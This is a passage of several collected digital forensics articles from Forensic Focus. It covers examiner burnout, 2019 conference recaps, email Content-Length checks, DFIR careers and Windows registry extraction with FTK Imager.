However, while it may be true that “the only way out is through,” you should be able to go “through” together with leaders, mentors, colleagues, friends, and family you trust. If you don’t feel you can trust these people, you need new people (including changing jobs if required).

Finally, consider professional therapy. In particular, Eye Movement Desensitization and Reprocessing (EMDR) therapy may help first responders experiencing secondary traumatic stress.

Dealing with burnout as a manager

At a time when #DFIR Twitter is awash with discussions about the talent shortage, addressing burnout takes more than an individual’s capacity to source the company Employee Assistance Program or read through all the Google Search results on the topic. It’s not a sign of a weak employee, so much as the result of normal employees who have been pushed to their breaking points.

The tricky part is that everyone’s breaking point is different. Shavers writes about:

“… regularly bringing myself to the burnout line, because that is the way I am. I enjoy working hard, solving problems, and moving on to the next challenge….

“I believe that most everyone in InfoSec (DF/IR) has the same type of personality. We see broken things and want to fix them. When we don’t see broken things, we break things and try to rebuild improved versions of what we just broke. That’s the nature of problem solvers.”

Rather than viewing burnout as being strictly a personal problem, individuals — both employees and managers — should pay close attention to the environment they’re working in, and the one they’re creating either actively or passively. It may be that one burned-out employee is a signal of a problem that could end up affecting more than just that person.

You can hire and train for resiliency, as this PoliceOne.com article pointed out; traits like high self-esteem might be ingrained (and develop over time with a consistently positive work environment); while other traits, like flexibility, optimism, and the ability to move on, might be teachable.

You can also make sure you’re supporting examiners in your lab by purchasing the right tools, and sending them to the right training — including, if possible and relevant, courses offered by organizations such as the Innocent Justice Foundation’s SHIFT Wellness. Even tool-specific training, though, can help examiners when they know how to use features that limit their exposure to traumatic content.

For both individuals and cultures, just because something is, doesn’t mean it has to be that way. Company and department culture is a choice, and it’s up to everyone to participate — even if it means shifting priorities or assumptions.

That’s where articles like the Forbes piece on bucking the “cult of busy” habit can help. It outlines not just day-to-day changes for individuals to make, but also lists some of the ways companies (or to some extent, departments) can change their culture.

In the DFIR and infosec worlds, companies that prioritize, for example, time for employees to take vacations and pursue personal goals in between engagements might have a leg up on those that don’t. If you’re interviewing, ask how the company empowers and aids responders to avoid burnout; if you’re employed, become an advocate if you think things could be improved.

Managers and colleagues themselves can be a line of defense, as well, as Shavers points out:

“I look for burnout in others. And dude, if I see it, I am on it like no one’s business. If it comes down to me just giving a hug, a pat on the back, or having a serious sit-down, I do it on the spot. Consider that if you see burnout in someone, that is a problem. You are a problem solver. Go solve that problem. You might end up doing more than just saving someone’s job.”

Most importantly, burnout shouldn’t be treated as a breakdown. Rather, it’s an opportunity for everyone to learn and grow: for individuals to process their own limits, and for organizations to rethink how they do business.

by Jade James 

This article is a recap of some of the main highlights from the Forensics Europe Expo 2019, which took place in London, UK on the 5th and 6th of March.

The Forensics Europe Expo has now run for seven years and is co-located with the Security & Counter Terror Expo at Olympia London. The expo has truly established itself as a must-visit event, with 2,500 professionals visiting exhibitors, attending seminars and workshops, and of course networking over the course of the two days.

The Expo offers the opportunity for visitors to experience first-hand innovative and cost effective solutions in the field of digital forensics and the more traditional wet forensics, provided by over 60 international suppliers. As well as the opportunity to attend the educational features where you can watch live demonstrations, there are also workshops on topics ranging from drone forensics to digital evidence management. All seminar sessions are CPD accredited.

Key speakers included Brian Cusack (Director of the Cyber Forensic Research Centre, AUT University) talking about making sense of international standards in digital forensics; Gareth Davies (Academic & Cyber Consultant, University of South Wales) giving a talk on ‘Vehicle Data Forensics on Unsupported Systems’; Dr Gillian Tully (Forensic Science Regulator) talking about ‘Quality Standards in Forensic Science’; and Martin Parker (Chief Scientist, National Ballistic Intelligence Agency) who gave a talk entitled ‘NABIS: A Ballistic Focal Point for the UK’.

Exhibitor Highlights

The Forensics Europe Expo is an opportunity to showcase industry developments and innovations in digital forensics.

Amped Software launched a new product at the Expo: an enhanced video player for modern policing. Replay allows users to analyse video evidence in the early stages of an investigation. A more in-depth review of Replay will be published on Forensic Focus shortly.

SecurCube Phone Log by SecurCube is software used for phone records analysis. They have launched an academic project which aims to supply SecurCube PhoneLog Technology to an existing academic partners’ labs, creating a learning and training programme.

Compelson Labs launched their MOBILedit Forensic Express PRO version, which is able to extract deleted data from phones and application including call history, contacts, SMS, MMS, photos, and video data from apps such as Facebook, WhatsApp, Viber, and Signal. This software is used by governments, police and law enforcement, the FBI and investigators worldwide and it is regularly tested by the US government’s NIST lab.

OpenText informed visitors about future updates to be included on TX1 consisting of a lock screen, with which users can apply a PIN to the TX1 to ensure that unauthorised users are unable to gain access during the imaging process. Another feature to be included is the ability for power-down drives – after a length of inactivity set by the user, the source or destination drive would power down in order to save energy and extend the life of the drive. There was also suggestion of enabling the TX1 to have more compatibility with EnCase and further enhancements with triaging, such as being able to preview documents and pictures directly from the TX1.

Magnet Forensics are now officially partnering with Grayshift, and GrayKey is now available for purchase directly through Magnet for law enforcement agencies only. Magnet maintains that they are the best solution for processing GrayKey images using Magnet AXIOM, although Cellebrite and BlackBag Technology‘s tools also have the capability of processing GrayKey images.

Conference Highlights

The Forensics Europe Expo is free to attend once you have registered, however those who pay to attend gain access to the FEE conference, which was produced by Digital Forensics Magazine this year. The conference focused strongly on artificial intelligence in digital forensics; drone data analysis; digital forensics as applied to vehicles; and the challenges presented by the introduction of digital forensics international quality standards.

Day one was dedicated to future challenges for those involved in digital forensics and digital investigations. Professor Brian Cusack delivered a talk outlining the inter-related agreements for evidence exchange and delivering a roadmap for standard information access and optimal use. Scott Zimmerman talked about the challenges of gathering evidence from multiple remote systems, including social media and the dark web, and used a couple of case studies (the Target store credit card breach and Fero v Excellus Health Plan Inc.) to demonstrate this.

Dr Raffaele Olivieri talked about the contextualisation of data collection during digital forensics analysis and overcoming the challenges of working with high amounts of heterogeneous data or ‘Big Data’. He also discussed the introduction of AI to aid the processing of such data. Zeno Geradts presented Artificial Intelligence in Digital Forensic Science, assessing the current state of AI and its role in systems from AFIS (Automated Fingerprint Identification System) to digital forensic software. Within the digital forensics community there seems to be a drive towards automation, to process large amounts of complex data using AI with minimal user intervention in order to save time and effort in manual investigations. The DigForASP group was also introduced: it aims to create networks to explore the potential for applying methods of artificial intelligence and automated reasoning in the digital forensics field. Membership in DigForASP is open to research groups from universities and other organisations working in the areas covered by the group.

Gareth Davies’ talk focused on vehicle forensics and showed attendees how to approach a vehicle from a digital forensics perspective. There was also a summation of the range of different infotainment systems from popular manufacturers and an exploration of the data extraction methods and data types that can be used as digital evidence. On a similar topic, Gabriella Ahmad-Assalemi talked about driver attribution for digital forensics investigations on connected cars. As it becomes more common to be able to extract and analyse a wealth of digital information from cars, such as recent destinations, favourite locations, routes, and personal data (e.g. call logs, contact lists, SMS messages, pictures, and videos), vehicle forensics is becoming a more prevalent branch in the field as a whole. The challenges can be attributed to the lack of tools available for extraction, that support the different file types of the proprietary infotainment systems. Manufacturers are reluctant to provide their specifications to vendors in order for them to update their tools sufficiently.

Day two set out to explore the wider forensics process, from laws and standards to new techniques and innovative technologies being developed across the world. ISO 17025 is a quality standard which has become a requirement of all UK digital forensics laboratories, in order to regulate the quality of digital evidence being submitted into the criminal justice system. Dr. Gillian Tully discussed quality standards in forensic science and offered best practices and suggestions on how practitioners can deliver the best quality of forensic science to the criminal justice system.

Throughout the day alongside the conference agenda there were workshops which were free to attend. These focused on the demonstration of tools from exhibitors.

Stuart Hutchinson from BlackBag Technologies kicked off the first day with a talk on APFS Forensic Analysis. New releases of MacQuisition and BlackLight will now be able to acquire and analyse encrypted APFS devices, including those that have encryption set by default and/or contain the new T2 hardware-assisted encryption chips.

Tanya Pankova of Oxygen Forensics discussed the use of Oxygen to extract WhatsApp data from a locked device using a WhatsApp QR token from a PC. The talk also guided attendees through the process of WhatsApp decryption on iOS and Android devices, offering the alternative method using a phone number. It was interesting to note that although WhatsApp offers end-to-end encryption, the media items on WhatsApp are not encrypted.

AccessData gave a talk on drone forensics and the investigation of unstructured data (which does not have a predefined data model) using their Quin-C laboratory platform which boasts deep machine-learning capabilities. Points to note: not all drones have the same artifacts and data is stored at various locations including onboard flash, removable storage and volatile memory.

Also on the theme of drone forensics, MSAB’s Paul Baxter gave a talk on how to extract and examine data from drones using XRY Drone and XRY XAMN, and announced the introduction of ‘The Drone Code’: UK legislation which was states the changes on the restrictions on flying drones near airfields from 13 March 2019 onwards and the new amendment which states that you will need to register as an operator of a drone. There was also mentions of multi-rotor vs fixed wing components; drone + ground control, camera (sensor/servo) and mobile device/tablet. Data extraction can be achieved through direct USB connection; camera data can be extracted from SD cards (which can sometimes be internal); and data from the mobile device linked to the operation of the drone can also be extracted.

Oleg Afonin of Elcomsoft gave a very interesting talk on iOS forensics. Visitors were presented with an overview of the entire iOS forensic workflow, including iOS 12, and how the USB Restricted Mode (RM) affects the ability to extract data. Things to consider when handling iOS devices are as follows: if you turn off an iOS device, you will lose the encryption key which is stored in RAM. Handling iOS devices incorrectly can kill your investigation (for example, attempting to guess the passcode or using Face ID will waste 1 out of 5 attempts you have to unlock the device). Since iOS 11.4.1, USB restricted mode engages after one hour since the last unlock state. From iOS 12 onwards, USB restricted mode engages immediately, and will automatically engage if a user has not connected to a trusted device for three days. It was also useful to learn about settings which are affected by USB restricted mode, such as lockdown records and passcode recovery (although Grayshift claims to bypass USB RM). Unlocking a device using biometrics is unavailable after a cold boot, therefore the passcode will be necessary. Furthermore, we were given information about what happens when you reset all settings on iOS devices. The following settings will be erased: display brightness, display battery percentage, all Wi-Fi passwords (but not any passwords or tokens which are stored in the keychain), com.apple.wifi.plist and iTunes backup password (all existing lockdown (pairing) records, data and all keychain items (except Wi-Fi) are preserved).

As well as the conference and workshops there were over 60 exhibitors to visit, of which 25 were specifically related to digital forensics. The Forensic Focus stand had a lot of visitors interested in learning more about the website and gaining access to resources, and it was nice to see familiar faces within the digital forensics community. At the end of the first day of the Expo,  networking drinks were helf in the VIP and Delegation lounge, where many visitors gathered and discussed events from the first day.

The Forensics Europe Expo is a good opportunity to gain information about the latest in trends and innovations within digital forensics. It was also the perfect opportunity to reach out to vendors and have live demonstrations of tools which are used in investigations (and pick up some goodies, including free trials of software). I was given live demonstrations of BlackBag’s Blacklight and Amped’s Replay. There is definitely a lot to see and experience even as a free visitor.

The next Forensic Europe Expo 2020 will be held at the London Excel on the 19th to 21st May 2020. Keep an eye on the official website for details.

by Arman Gungor

As forensic examiners, we often have to analyze emails in isolation without the benefit of server metadata, neighbor messages, or data from other sources such as workstations. When authenticating an email in isolation, every detail counts—we review a long list of data points such as formatting discrepancies within the message body, dates hidden in MIME boundary delimiters, and header fields.

One data point I often see being overlooked is the Content-Length header field. The value this field contains can be leveraged for a simple but powerful check to verify an email’s payload. In this post, I will discuss how we need to preserve emails to be able to utilize the Content-Length header field, how to utilize the data in this field, and a couple of use case scenarios. Let’s start by defining Content-Length.

What Is Content-Length?

Content-Length is mentioned in the Common Internet Message Headers memo as one of the non-standard message headers. It is used by some email providers such as Yahoo and AOL, and it contains a decimal number representing the number of bytes found in the payload of the message.

Let’s take a look at an example message:

The Content-Length header field for the above message is populated as 1981. If we count the number of characters in the message after the message header, including the newline character on the blank line following the Content-Length header field and the new line characters at the end of each subsequent line, we find that the number of characters in the message payload is in fact 1981.

TIP: You can count the characters very quickly by using a text editor. I use BBEdit on Mac and UltraEdit on PC, and they both count the characters automatically when you highlight the text. It is important that you count the line breaks as a single byte as in Unix (LF), not as two bytes as in Windows (CR/LF). If you are doing this on a Windows system, you can achieve this by setting up your text editor to use Unix-style line endings.

Here is a quick screen capture showing how we can count the characters:

Figure 2 — Calculating Payload Size

The sample message I used above was a short one to make illustration easier. This technique also works for much larger messages, including ones containing several attachments.

How Can We Use the Content-Length Field in Email Forensics?

It’s not hard to imagine how the Content-Length header field can be useful in a forensic examination. For instance, if we are looking at an authentic email acquired from Yahoo, we should expect the message payload to agree with the value found in the Content-Length field. A discrepancy might mean that the message body, the header, or both might have been manipulated.

In order to utilize this data point, the target email message should be preserved in its original form. For instance, if you logged into Yahoo webmail and used the “view raw message” menu item and saved the message as an EML, you could utilize the Content-Length value in your forensic exam. Similarly, acquiring the messages using Forensic Email Collector results in a hash match with the manual method above, and lends itself to a content-length comparison.

If you are not focused on a single message, but you are looking at a larger data set, you could automate thingsby writing a script to scan a folder full of MIME messages (e.g., FEC’s MIME output folder) and comparing their Content-Length values to their payload byte counts in bulk. You can then log the discrepancies and take a closer look at them as part of your email examination workflow.

Another use case can be when examining a fraudulent message that was created by repurposing an already existing, legitimate message. If the fraudulent message and the legitimate message have the same Content-Length header field value, and that value matches only the payload length of the legitimate message, this could be a valuable data point that can be used to show which message is the true copy.

What Not To Do

Every character counts when calculating the byte count of the message payload. If the message changes in any way, including text encoding and MIME boundary delimiters, the calculation would be thrown off.

You will find that if you acquire the messages and convert them to another format, the Content-Length value often no longer matches the payload length—even if you convert back to MIME format. For instance, acquiring the messages using Outlook, ingesting the resultant OST into your email investigation tool, and then going back to EML format, in my experience, does not work. This is one of the reasons why I recommend keeping the MIME format of the messages during forensic preservation. The amount of additional disk space is often negligible compared to the forensic value you get.

Conclusion

Not every message header contains the Content-Length field. But when available, Content-Length can be a very valuable data point during forensic email investigations. In order to make use of it, forensic examiners should make an effort to preserve emails in the format that is the closest to the original format of the email. In most cases, this is MIME format as defined by RFC 5322.

If your target message contains the Content-Length header field, don’t simply ignore it. Research how that field is populated for the service provider you are dealing with, and determine whether its contents are consistent with how the field would be populated for a legitimate message.

References:
RFC-5322: Internet Message Format
RFC-2076: Common Internet Message Headers

About The Author

Arman Gungor, CCE, is a digital forensics and eDiscovery expert and the founder of Metaspike. He has over 21 years’ computer and technology experience and has been appointed by courts as a neutral computer forensics expert as well as a neutral eDiscovery consultant.

by Christa Miller, Forensic Focus

In the 30 or so years since the advent of personal computers made digital forensics a viable career path, the profession has matured to the extent of making multiple career paths possible. Now, professionals who are interested in digital forensics have options that range from law enforcement and government investigations, to corporate and self-employed consulting — and often switch between tracks.

Of course, having so many options means that forensic professionals have to be intentional about setting and following their course. The field continues to evolve, so new options may make themselves available in the short or long terms.

On the other hand, whether professionals will be available to fill those roles is a key question. A recent SANS Institute study showed that while nearly one-third of 4,000 surveyed high-schoolers across Europe, the Middle East, and Africa (the EMEA region) were interested in IT as a broad career field, only half of those students were specifically interested in a cybersecurity career, which sees stiff competition from careers in app and software development, IT system design, artificial intelligence and robotics, among others.

Helping students to understand what’s possible and what’s on the horizon, then, will become increasingly important for employers, parents, teachers, and others with a stake in the future of cybersecurity and DFIR. What possibilities exist, and how can forensic professionals flexibly plan for the future?

Identifying DFIR Career Paths

Defining what counts as digital forensics is relatively easy. In 2001, the Digital Forensics Research Workshop (DFRWS) defined it as: 

“The use of scientifically derived and proven methods toward the preservation, collection, validation, identification, analysis, interpretation, documentation and presentation of digital evidence derived from digital sources for the purpose of facilitating or furthering the reconstruction of events found to be criminal, or helping to anticipate unauthorized actions shown to be disruptive to planned operations.”

Or, as information security expert Lesley Carhart put it more succinctly: “… the exciting science of taking all manner of digital ^stuff^, and finding out what it’s done, when it was done, and who did it.”

Defining where digital forensics sits, however, is a little trickier. Because the skills outlined above are useful to more than just criminal investigations, as a digital forensic professional you might find yourself working:

• Alongside litigation support professionals during e-discovery prior to a major corporate lawsuit.
• As part of a cybersecurity incident response team (CSIRT), analyzing breached systems to find the root cause that will be used to apply patches.
• In support of corporate investigators of insider threats, employee misconduct, and related issues.

That isn’t to say you won’t find yourself squarely working investigations for law enforcement, a national government agency, or a corporation. These roles continue to be in high demand locally, nationally, even internationally. Forensic expertise is also valuable to software vendors in the form of subject matter expertise that can inform training, marketing and sales, product development, and other areas.

Where you end up working may be a function of a particular area of technical expertise. For instance, you might:

• Focus on computers, mobile devices, networks, the cloud, and/or Internet of Things (IoT) devices.
• Or, you might want to understand the interplay of evidence among all these storage locations across networks.
• Develop deep data recovery expertise, which can be valuable to entities needing assistance with unlocking a damaged or unusual device.
• Choose to specialize in certain types of media such as digital images or audio/video.

Deciding Which Career Path To Take

Many forensic professionals evolved their careers along with the profession itself. For example, when mobile devices’ popularity began to take off, law enforcement forensic examiners who had cut their teeth on computer forensics were often the only people in their agency equipped to figure out how to acquire data from phones.

To some extent, evolving along with digital trends still happens. Witness the interest in drone and Internet of Things forensics, developing artificial intelligence-powered forensic tools, and so on. With digital forensics now more mainstream in both public and private sectors, though, figuring out which path to take requires careful consideration.

In his “Life After Law Enforcement” blog series, Eric Huber lays out quite a number of considerations. Among these:

• Mission. “Law enforcement agencies are put upon this earth to put bad people behind bars,” Huber writes, in contrast to private companies, where the goal is to turn a profit.
• Compensation and benefits. One may appear more attractive than the other, but beware hidden costs.
• Job security and the rate of change, as well as your own tolerance for risk, organizational politics of different flavors, and what you’re willing to do to mitigate risk.
• How you feel about where you are currently.

Huber also covers the different flavors of a private-sector career, including both corporate and consulting work.

The Skills You Need For A Digital Forensics Career

To some extent, learning on the job will always be a part of DFIR. Technology changes too fast for forensic professionals to be able to get too comfortable in a particular specialty area. When smartphones fall out of fashion, for instance, in favor of wearable devices that store data in the cloud, “mobile forensics” may just come to mean something new.

At that point, it’s more about focusing on developing your underlying expertise — the foundational skills you’ll need when working with any set of 1’s and 0’s, regardless of where they came from.

In its recent blog post, the EC Council outlined several of these foundational skills, including:

• Technical aptitude, or understanding how computer-based systems work so you can devise the best methods for obtaining data from them. It’s also wise to develop the knowledge of how illicit material gets on a target device, or how it moves around targets, in addition to cybersecurity threats, vulnerabilities, and how different breaches occurred.
• Analytical talent and skill; a prerequisite to both obtaining and maintaining this technical knowledge. Not only acquiring, but also accurately interpreting digital evidence is a must.
• Strong communication skills, both written and verbal. In particular, you’ll need to know how to explain results to the least technical of audiences at numerous levels, such as jurors. As an addendum, a working knowledge of different facets of law and general investigative techniques may be helpful to communicate effectively with attorneys and investigators.

Your willingness to learn is the final takeaway of the EC Council’s article. The industry’s constant evolution demands forensic professionals who are dedicated to continuing education, whether by participating in formal training, informal forum and social media discussions, their own research, or reading academic articles, books, etc.

Meeting Challenges In DFIR Careers

Nothing worth doing is without its challenges, and DFIR is a field that comes with a number of unique ones. When it comes to building your career, for example, you might find that some of the following aspects challenge you.

What you thought you were interested in might not capture your attention after all. At the college level, this might mean changing your thesis topic, your minor, or even your major. At work, it might mean finding a job in a different agency or company, location, or a different profession.

These decisions can be difficult to make because of the “sunk cost” of effort and money you’ve put towards attaining your qualifications. Remaining in a poor fit, however, ultimately does both you and your organization a disservice.

Resource constraints and operational demands in your work environment may mean that you don’t get to do the research you hoped to do, or even focus on the kinds of devices and problems you hoped to be able to work on. You may even, as Huber pointed out, be limited in advancement due to organizational policies. This can happen in both private and public sectors.

You could have supervisors who don’t understand the work you do, making it harder for you to champion growing your lab or even maintaining tools and service agreements. Training is expensive, yet is often one of the first budget line items to be cut in lean times.

The work you do may be psychologically taxing and even harmful. Burnout is a real phenomenon, and the job can result in secondary traumatic stress if you don’t learn and use the tools to head it off.

How do you address these challenges? Many forensic practitioners recommend having a mentor. Whether this person is a faculty member at your college or university, a supervisor, a senior person in your lab, or even someone you connected with online or at a conference, mentors can help you navigate the uniquely challenging aspects of a digital forensics career.

In addition to mentors, it’s wise to build relationships with other practitioners in the DFIR community. Whether you attend one or more conferences in the course of a year, or make the time to connect with others online — here on the Forensic Focus forums, on Twitter, or on a dedicated Slack channel, for instance — regularly talking with others can also help you to set and manage expectations, make good decisions, and even inspire new research or other ways to contribute.

What DFIR Has To Offer

Many longtime members of the profession report a great deal of personal satisfaction in their roles. Stress is considered a small price to pay for the ability to hunt and catch child predators, terrorists, and other bad actors — and to rescue their victims, prevent additional harm, and bring justice. With a career path you intentionally set and follow, acquiring the skills you need, and a plan for addressing challenges that arise, digital forensics can be a lasting career that brings good to the world.

by Mattia Epifani

The Techno Security and Forensics CA conference took place between 11^th and 13^th March at The Hilton Torrey Pines in La Jolla (San Diego). More than 200 attendees were present, coming from different fields like digital forensics, e-discovery, incident response and cybersecurity. Most of the attendees were from the U.S. but many people from Canada and Europe were also present.

Forensic Focus was present for the entire conference and documented it in real-time on Twitter. The conference had four different tracks (Forensics, Audit/Risk Management, Information Security and Investigation) and more than 75 talks took place there.

This article is a wrap-up of the conference highlighting some of the most interesting and innovative topics, with particular regard to the Forensics and Investigations tracks.

As a general consideration we saw a lot of development and interest in three fields:

• improving acquisition and analysis techniques of “traditional” devices like computer and mobile devices, both in the field and in the lab;
• studying emerging sources of evidence (in particular IoT devices, drones, vehicles, DVRs, and so on);
• developing techniques to acquire data from remote sources (email, cloud, etc.).

11^th March 2019 – Day One

The first day started with a talk by Atola Technology on evidence acquisition: where it has been, where it is today, and recent breakthroughs.

In parallel, an interesting session on DVR forensics was run by DME Forensics: during the talk two real cases were discussed, one involving a Samsung DVR and the other involving a Q-See DVR.

Immediately after this a second session took place. We highlight in particular an in-depth presentation by Brian Hill, Oxygen Forensics, on deleted data from iOS and Android smartphones, illustrating possible ways to recover it from different sources (cloud or external media). Vico Marziale from Blackbag Technology gave a really interesting presentation on the forensic analysis of Windows 10 with particular highlights on the Windows Timeline Database, the Windows 10 Notification Center and the Background Activity Moderator (BAM).

On the investigation side, a talk by Angel Grant, RSA, discussed how to understand cultural aspects of hacking to improve cyber investigations: this is absolutely a field in which traditional investigators need to be trained more.

After the lunch break, a talk on mobile app analysis by James Eichbaum, MSAB, took place: the main topic was on manual analysis of SQLite databases and application data in general, with particular highlights on embedded objects, encoding and encryption.

Another really interesting talk was held by Arman Gungor from Metaspike, on leveraging server metadata in forensic email investigations. The presentation illustrated in particular what types of email metadata are kept by servers, and how to retrieve and forensically preserve those metadata.

The last talk of the first day was one of the most innovative and enlightening of the entire conference. It was given by A.G. Speake from Berla Corporation, on the topic of vehicle system forensics. The session gave a complete overview of what data can be acquired from infotainment and telematics systems within the vehicle, with an in-depth discussion on the non-destructive methods to acquire and analyze it. Two interesting case studies were presented: an incident that took place in London in 2017; and a kidnapping and murder that took place in Kennewick, WA in which data from a rental car were extracted and analyzed. For an overview of Vehicle Forensics we suggest you to take a look at this YouTube video: although it is not fully up to date, it provides an interesting overview of the potentialities of vehicle forensics.

At the end of the day a happy hour took place in the show floor area, where the attendees had the chance to see some of the news in terms of forensics hardware and software in the market.

12th March 2019 – Day Two

Day two had an early start at 8 a.m with the keynote of the conference provided by Matthew Rosenquist, Intel Corporation. The talk was titled “The Verification of Truth: The Future of Digital Forensics and its Role in Cybersecurity”. During the talk he discussed how “digital forensics” will grow to mean the verification of truth and will play an ever-increasing role in understanding responsibility and controlling the dissemination of fear, uncertainty, and doubt through actuarial data. Rosenquist’s presentation is available on Slideshare.

In the morning, a talk by Ed Michael from Cellebrite illustrated advanced analysis techniques for mobile device evidence analysis. In particular some examples of manual analysis of applications through the use of SQL queries and Python scripts were provided. The talk was really practical and full of references and examples for the audience.

Then we attended a brilliant talk on bypassing multi-factor authentication by Jeff Ham and James Hovious from Mandiant. They presented an updated version of the topic they had discussed at the SANS EU DFIR Summit in Prague last October: slides from the SANS event are available here.

The last talk of the morning, one of the most technical of the event, was from Jason Hale on how to improve USB device forensics in Windows OS, and some of the latest findings to be analyzed in this constantly-changing set of artifacts. Jason is the creator and developer of USB Detective: a community version of the software can be requested on the website.

The first talk after lunch was by Jessica Hyde on handling IoT evidence. Jessica did a great presentation illustrating the challenges of some of the most commonly found devices on the market like Amazon Echo, Alexa and Fitbit and how to extract data from them and from the related cloud accounts.

The last talk of the day was again on a really interesting emerging topic: the forensic analysis of drones. The presentation was given by Dave Rathbone from VTO Labs. The session illustrated the results of “The Drone Forensic Program” funded by the United States Department of Homeland Security. The project identified and defined the forensic best practices for the retrieval of data from consumer and professional level drones. The results of the research are publicly available here.

Day 2 ended with a reception cocktail in the amazing Parterre Gardens of the Hilton Hotel.

13th March 2019 – Day Three

Day 3 started with an early session on current trends in illegal dark web activity, with specific focus on the anatomy of a transaction and the role of cryptocurrencies. Then, an in-depth and technical presentation by Jason Roslewicz, SUMURI LLC, on “APFS Imaging” took place, addressing forensic imaging methods of APFS Macs.

The last talk of the morning was again by Jessica Hyde from Magnet Forensics, and it was about the iOS maturation from iOS 10 to iOS 12. Jessica provided a really detailed explanation of the improvements made by Apple to prevent access to the device and an overview of some of the most interesting artifacts available with a full file system image of an iOS device. A webinar on the same topic is available on Magnet Forensics’ website.

Lunch took place in the Hilton garden, with really tasty Mexican food!

Just after lunch was an interesting talk by Brian Hill from Oxygen Forensics, on geolocation data that can be extracted from mobile phones, drones and cloud accounts.

Just after lunch, Susteen gave a presentation on the latest developments on their DataPilot 10 mobile forensics device developed for on-the-field acquisitions and recently introduced to the market. A review of this device was published on Forensic Focus in October 2018.

The last talk of the day was by Andrea Amico, an Italian researcher and founder of Privacy4Cars, a mobile application and SDK designed to help erase Personally Identifiable Information (PII) from modern vehicles. The app is available for free on both Apple Store and Google Play and it enables consumers and businesses to quickly delete data stored by modern vehicle infotainment systems. During the presentation Andrea illustrated the CarsBlues vulnerability, a Bluetooth-based attack that affects tens of millions of vehicles and was publicly disclosed in November 2018 by the company. During the presentation a methodology to extract contacts and call logs from a vehicle thorough the Bluetooth connection was illustrated. Some videos demonstrating this technique are available on Privacy4Cars’ YouTube channel.

The conference ended with some time for socializing at the Hilton pool. Overall it was a great event and provided a good opportunity to see where digital forensics is going now and in the future.

The next Techno Forensics event will take place in Myrtle Beach between 2^nd and 5^th June 2019. Next year’s San Diego chapter is planned for 9^th – 11^th March 2020.

by Chirath De Alwis

Computer forensics is the process of methodically examining computer media (hard disks, diskettes, tapes, etc.) for evidence [1].  When considering computer forensics, registry forensics plays a huge role because of the amount of the data that is stored on the registry and the importance of the stored data. The extraction of this data is therefore highly important when investigating. Due to the limitation of tools that can extract forensically valuable data from registry files, investigators have to extract it manually. Because of the registry file format (.REG), extracting information is a challenging task for investigators. Registry files normally store data under unique values called “Keys”. One challenge that investigators must face is the lack of knowledge about Registry Keys and the data which stored under those Keys. This article provide an overview of registry file acquisition, registry structure and common issues in registry analysis.

Registry File Acquisition

The Windows registry is a central hierarchical database intended to store information that is necessary to configure the system for one or more users, applications or hardware devices [2]. There are four main registry files: System, Software, Security and SAM registry. Each registry file contains different information under keywords. The structure of the Windows registry is similar to file system directories. Registry files are located at the “C:drive/windows/system32/config/”  file path. Each registry contains lots of forensically valuable information.

Investigating the Windows registry is quite a difficult task, because in order to investigate it properly, the registry needs to be extracted from the computer. Extraction of the registry file is not just a normal copy and paste function. Since registry files store all the configuration information of the computer, it automatically updates every second. In order to extract Windows registry files from the computer, investigators have to use third-party software such as FTK Imager [3], EnCase Forensic [4]  or similar tools. FTK Imager is oneo fthe most widely used tool for this task. Apart from using third-party software, some reasearch has been carried out to demonstrate how to extract registry information from Windows CE memory images [9] and volatile memory (RAM) [10].

AccessData FTK Imager

AccessData FTK (Forensic Tool Kit) Imager is the most widely used standalone disk imaging program to extract the Windows registry from computer. Access Data FTK Imager 3.2.0.0 basically scans the hard drive in order to identify various pieces of information. This tool can be used for a variety of processes when extracting the Windows registry. These include: 

• Physical Drive – Extract from a hard drive
• Logical Drive – Extract from a partition
• Image File – Extract from an image file
• Contents of a Folder – Logical file-level analysis only: excludes deleted files and unallocated space 

The steps to extract registry files from Access Data FTK Imager 3.2.0.0 are as follows.

Step 1 – Open “Access Data FTK Imager 3.2.0.0”.

Figure 1 : Main Window – Access Data FTK Imager 3.2.0.0

Step 2 – Click on “Add Evidence Item” button.

Figure 2 : Select Source Window – Access Data FTK Imager 3.2.0.0

Step 3 – Select “Logical Drive” radio button.

Figure 3 : Select Source Window – Access Data FTK Imager 3.2.0.0

Step 4 – Select source drive.

Figure 4 : Select Drive Window – Access Data FTK Imager 3.2.0.0

Step 5 – Scan “MFT” by expanding “Evidence Tree”.

Figure 5 : FS Progress Window – Access Data FTK Imager 3.2.0.0

Step 6 – Go to windows/system32/config/.

Figure 6 : Extracted Information Window – Access Data FTK Imager 3.2.0.0

Step 7 – Export registry file by clicking “Export Files” button.

Figure 7 : Export File Pop Up Window – Access Data FTK Imager 3.2.0.0

Step 8 – Select the destination folder.

Figure 8 : Browse For Folder Window – Access Data FTK Imager 3.2.0.0

Registry Structure

The structure of the Windows registry is similar to file system directories. Both the Windows registry and the file system are organized in a tree structure [5]. The Windows registry stores all configuration settings as keys [6]. The registry updates its stored configurations according to the changes which are made while hardware and software are being used. In Windows XP, 2000 and 2003 (Windows NT based operating systems) the registry files are stored in the configuration folder located at Windows\System32\Config folder.

As mentioned above, the structure of the Windows registry is similar to Windows folders and files. Each main folder is known as a “Hive”. Hives are made of a combination of sub folders, called “Keys”. These Keys contain Sub Keys with configuration information.

Figure 9 : Registry Structure (c) Help.comodo.com, 2019

The figure above shows a Registry Editor window of a computer. It shows the internal structure of the registry. A Hive is a logical group of keys, sub keys and values in the registry that has a set of supporting files containing backups of its data [7]. There are five main Hives:

• HKEY_CLASSES_ROOT (HKCR)
• HKEY_USERS (HKU)
• HKEY_CURRENT_USER (HKCU)
• HKEY_LOCAL_MACHINE (HKLM)
• HKEY_CURRENT_CONFIG (HKCC)

Registry Hive and its supporting files are unique to each other. According to Microsoft, the hives and supporting files are [7]:

• HKEY_CURRENT_CONFIG – System, System.alt, System.log, System.sav
• HKEY_CURRENT_USER – Ntuser.dat, Ntuser.dat.log
• HKEY_LOCAL_MACHINE\SAM – Sam, Sam.log, Sam.sav
• HKEY_LOCAL_MACHINE\Security – Security, Security.log, Security.sav
• HKEY_LOCAL_MACHINE\Software – Software, Software.log, Software.sav
• HKEY_LOCAL_MACHINE\System – System, System.alt, System.log, System.sav
• HKEY_USER\.DEFAULT – Default, Default.log, Default.sav

In the HKEY_LOCAL_MACHINE Hive, there are five main Keys. Each Key contains Sub Keys with configuration information. These are:

• HARDWARE
• SAM (Security Accounts Manager)
• SECURITY
• SOFTWARE
• SYSTEM

Figure 10 : The files in the Windows\System32\Config folder and their associations with the hives (c) Help.comodo.com, 2019

Figure 10 shows the information contained in the Software, System, SAM, Security, Default and Userdiff files and their respective associated file names.

